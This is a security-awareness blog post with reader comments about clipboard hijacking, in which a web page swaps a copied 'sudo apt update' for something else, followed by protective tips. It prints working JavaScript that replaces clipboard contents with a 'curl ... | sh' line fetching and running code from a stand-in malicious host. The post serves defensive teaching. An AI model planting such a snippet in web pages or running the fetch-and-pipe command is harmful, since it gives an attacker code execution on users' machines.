An unusual hacking demonstration will make you think twice before copying or pasting any text.
This is why you should NEVER copy paste commands directly into your terminal. Ask any developer or administrator if they have ever copied a line orders or a code snippet from the web. The answer would probably be YES. You would assume that what you copied is what you paste, right? Well, no!
You think you're copying one thing, but it's replaced with something else, like malicious code. All it takes is a single line of code inserted into the code you copied to create a backdoor in your application.
This attack is very simple but can cause great damage. Let's see how it works in practice:
Thanks to Harel Friedlander for recording this video.
Suppose you are looking for how to update your ubuntu and found the following command, Copy it. Try it - copy and paste the following command:
$ sudo apt update
Here is the JavaScript running exploit.
document.getElementById('copyme').addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain',
'echo "τo sudo apt update έγινε [curl http://kakovoulo-site.com | sh]"\n'
);
e.preventDefault();
});
How can I protect myself?
The safest way is to not paste anything from the web into your terminal. Another choice is to add “#” before pasting, this will turn the command into a “comment” and not execute it. That way you'll see what you're going to paste before your terminal runs it. You can of course paste the command into a txt file before putting it in your terminal.
Also many terminals can be configured not to run automatically when you paste a "\ n" (new line)
The above was just one example of why awareness raising is necessary to avoid any intrusion. There are many examples of really malicious scripts circulating on the internet.
The other alternative, of course, is to use an intermediate destination (eg text editor), where it will show what you really have in your clipboard.
A humble thank you!
Good evening, Happy Birthday and Happy New Year !!
I would like to thank you first for your informative articles.
Another solution that solves the above problem works in firefox, about: config >> dom.event.clipboardevents.enabled >> false.
A friend of the most customizable browser in the world.
happy new year, thank you for adding